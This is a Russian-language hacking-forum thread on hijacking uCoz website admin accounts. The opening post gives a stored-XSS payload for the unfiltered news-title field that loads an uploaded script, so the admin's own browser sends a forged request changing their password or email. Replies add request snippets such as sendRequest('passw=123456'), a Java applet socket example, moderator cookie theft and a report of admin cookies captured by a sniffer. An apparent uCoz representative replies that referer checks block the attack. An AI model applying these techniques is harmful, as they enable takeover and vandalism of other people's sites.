Найден способ взлома UcoZ!
 

Все мы знаем, что UcoZ неприступный и уже все головы сломали (ломают) как его взломать.
Cookie админа украсть не проблема, даже если на форуме выключены HTML теги.

Но! По умолчанию в UcoZ стоит привязка IP к админу. Тоесть куки то мы украли, но войти не сможем. А админ не станет эту привязку просто так отключать.
Но привязка IP модератора по умолачнию выключена. ;) так что вы можете украсть куки модератора, войти под его логином, и удалить все темы, новости, и.т. д.
По идее то нам зачастую это и нужно - насолить бедной жертве =)))
Но нам это неподходит. Двигаемся дальше.

А что если админ сам себе, не подозревая того, сменит свой пароль на нужный нам? =)

Именно так мы и поступим.

Дело в том, что в форме добавления новостей не фильтруется поле "Название материала". :cool:

А что мы можем с этим сделать? Можно здесь вставить скрипт перенаправки на сниффер, но нам то куки админа ненужны.
А вот что! =)

Мы внедрим файл в заголовок нашей "злой" новости! :)

Создаем любой файлик. И в него вписываем код.
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
Теперь заливаем его на сайте который хотим взломать.
Это можно сделать например так:
Зайти на форум. В форме написания сообщения прикрпеить наш файл( там есть кнопочка "Обзор", вот через нее надо прикреплять) Сообщение напишите произвольное.
Когда нажмете отправить, увидите свое сообщение, а чуть нижу будет написано " Прикрепления: "название файла", его размер".
Наведите курсор на название этого файлика и увидите в нижнем левом углу ссылку на этот файл.

Незнаю как у вас, а у меня, в Фаерфоксе, можно сделать так: Клик правой кнопкой по ссылке на файл, выбираю там пункт "Копировать ссылку". И все, ссылку у меня в буфере обмена.
Ну а у кого неть такой функции, придется набирать ссылку ручками =)

Теперь идем создавать новость.

Новость напишите произвольную.
Это не имеет значения, нас интересует строка "Название материала".

Туда вписываем

<script src="../путь до файла"></script>

Например у меня так:

<script src="../_fr/0/0962166.img"></script>


Видите у меня полсе ...src=" стоят 2 точки?
Это не обозначает "адрес сайта который надо взломать"! Так UcoZ воспринимает адрес самого сайта (главной страницы).

И вуаля! пароль изменен нам на нужный :cool:


Вот только пожалуйста не кричите на меня, но я незнаю кода, для POST запроса. Я с ним не в ладах))

Если кто может сделать этот код, то пишите тут!
Собственно для этого я и сделал тему)

Вообщем нам надо только сделать этот код, и вставить его в файлик, который потом заливать будем на сайт! И Все! Считай неприступный UcoZ взломан :o

я конечно не знаком с системой ucoz, но вроде везде где идет смена пароля требуеться вести старый для подтвержения.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Вот самый простинкий ajax запрос:

А ты можешь его подогнать под конкретно Укоз?

Зарегай мне акк на укозе, или дай какойто, я хз че там передаеться.

Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)

мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)

ТС, ActiveX работает только в IE.
Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.

Универсальный способ отправить POST-запрос с помощью html и js:
так работать не будет!

А с помощью Flash можно отравлять запросы?

Razor нам ненужны Куки. Нам надо, чтобы через этот пост запрос админ переходил в свой профиль, и менял свой пароль. Я точно непомню, но вроде переменная, в которой вводится праоль там называется passw. Но, я сейчас придумал другой варинат. Если неполучится изменить переменную пассв, то можно поменять не пароль а e-mail на свой. Потом сказать что ты типо забыл пароль и тебе на e-mail придет письмо. =)

Ну зарегайте любой сайт на Укозе, это быстро же и покапайтесь =)

ucoz.ru

Но, я вроде уже придумал код, но сегодня выложить немогу, ждите до завтра )))))

БРЕД, ТАК РАБОТАТЬ БУДЕТ,И ЭТО МНОЮ УЖЕ ПРОВЕРЯЛОСЬ НЕ ОДНОКРАТНО!!! ДРУГОЕ ДЕЛО ЕСЛИ ВЫ ИСПОЛЬЗУЕТЕ В САМОМ XMLHTTPRequest запрос к другому домену то да, этого сделать не получиться. ЕСЛИ НЕ ВЕРИТЕ Я МОГУ УСТРОИТЬ МАЛЕНЬКУЮ ДЕМОНТСРАЦИЮ ЭТОГО
Вот почитайте
http://javascript.ru/ajax/cross-domain-scripting
мм, если вы подразумеваете что XMLHTTPRequest в старых браузерах от ие был не native object а вызывался через ActiveX, то да, но если вы посмотрите на код, то там идет проверка на это, в остальных браузерах с подержкой XMLHTTPRequest он идет как native object и в новых версиях ИЕ.

Возможно запрос будет выглядеть так (полный код на 1 странице давал "Какуна Матата")

......
if(params!==passw="123456"){
req=initXMLHTTPRequest();
if (req)
{
.....
Или нет?
Если нам нужно отправить переменнуб passw то как будет выглядеть код?

не, немного не так,
sendRequest("passw=123456");

Я бы не назвал это столь большой новостью. На uCoz и правда не идет запрос на ввод старого пароля, при установке нового. Также при изменении инфы не требуется вводить капчу. Давно замечал это.

Передача новых личных данных идет в формате multipart/form-data и передается довольно много параметров.

А это и никто и не называет большой новостью. Большой новостью называют, то что можно через запросы сменить пароль админа. Или его е-мэил.

multipart/form-data - для передачи файлов а вот так в форме - application/x-www-form-urlencoded

именно про это я и говорил

Ну может я вас не правильно понял, или вы меня.

Матата, он имел ввиду что нужно указывать ссылку на скрипт находящийся в пределах хоста. А в самом скрипте можно указывать на любой скрипт.

Я так понял)))

И не забывайте, что Укоз не поддерживает PHP!

Ты понял все с точностью до наоборот. Как раз сылку в src можно указывать на любой хост а в самом скрипте при XMLHTTPRequest только на данный домен до буковки, то есть www.test.ru и test.ru уже будут считаться разными доменами, поэтому лутчше всегда узать location.host

Разор, не мог бы ты объяснить про ПОСТ с помощью ява скрипт?
Я капнул в исходниках.
Вот.

На основе этого, мог бы ты сделать POST-запрос с помощью html и js?

Я посмотрел твой код на 2 странице, но я плохо понял(

с учетом того что я тебе написал

sendRequest("email=mailadmina@yandex.ru");

а url - укажи action

Вобшем создаешь скрипт файл, например, admin.js
в нем

Я как раз о смене пароля с помощью запросов, но говорю об этом с другой стороны.

Да, но открой сниффер и посмотри пакеты. При смене пароля данные отсылаются именно в multipart/form-data.

Ну, не стоит считать что если у тебя так то у других также, судя по пакетам которые отсылаються у меня то в фф именно application/x-www-form-urlencoded, в других не смотрел, может это зависит от браузера.

Какуна матата, я попробовал твой способ. У меня все равно ничего что то неполучается.
Давай я зарегестрирую тебе сайт на UcoZ и ты сам попробуешь?

1. Кража куков модератора ничего не даст, потому что куки на другом компьютере работать не будут (если защита).
2. Сделать автоформу для того чтобы модератор изменил пароль админа не выйдет по 2 причинам:
a) модератор не может менять пароли других пользователей
b) при редактировании данных проверяется реферер (отключите передачу рефереров в опере и сами попробуйте свой профиль отредактировать).

Чтобы в дальнейшем не возникало подобных тем и желаний создавать автоформы для подобных действий, после обновления системы uCoz, в форму редактирования профиля будет добавлена капча....

Благодарю за сотрудничество ;)

3dn не модератор будет изменять данные админу! А сам админ!!!

суть не меняется, админ не сможет автоформу отправить чтобы изменить свой пароль... делается проверка реферера, в котором проверяется точный адрес страницы с которой можно редактировать...

можно

Ты работаешь на этом хостинге?
Админ? Разведчик? :(

с помошью флеш вроде можно менять одельно взятые заголовки, правдо только 8-7 версией flash
он засланый казачек, бей его... шютка :)

Так який ж з способов рабочий на 100 % ?

пробуйте всякие, может что-то получится :)

Да еше один из вариантов - это использовать java Aplet, и если например соединение с сервером делать посредством Socket - то можно писать ЛЮБОЙ HTTP заголовок
вот например так

Socket socket = new Socket(host, port) ;
BufferedReader reader = new BufferedReader(
new InputStreamReader(socket.getlnputstream()));
PrintWriter writer = new PrintWriter(
socket.getOutputStream() ) ;
writer.print('GET /ddd.php?key=ashgdhagsdhfjasfdfasdasdasdasd HTTP/1.1\r\nUser-Agent: Fuck Off\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nHost: www.test1.ru\r\nConnection: Close\r\n\r\n') ;
writer.flush() ;
socket.shutdownOutput();
String line;
while((line = reader.readLine()) != null)
socket.close() ;

Но тут есть одно но, ip адресс откуда скачиваеться java applet должен совпадать с ip куда идет обрашения appleta, зато можно посылать запросы к любому хосту находяшимуся на даном ip, ведь сервер оличает к какому хосту мы обрашаемся по Host: HTTP заголовка, ну и естествено у жертвы должна присутствывать подержка java в браузере.

Чёто не вкатило у меня!
Есть ещё у кого нить идейки?

Это я JAVA applet, не стоит все понимать буквально и тыкать в браузер, я выложил просто для примера.

Удалите тему плиз.

Попробуйте кто нибудь через мини чат пробиться...
Я пока толком не знаю как составить запрос,
сегодня пришли куки админа:

REFERER: http://*****.ru/***.img
QUERY: 58&
AGENT: Opera/9.52 (Windows NT 5.1; U; MRA 5.3 (build 02560); ru)

Буду пробовать ещё, но если кто знает, посоветуйте как написать код.

Куки админа ничего не дадут. В Укозе по умолчанию стоит у админов привязка к IP.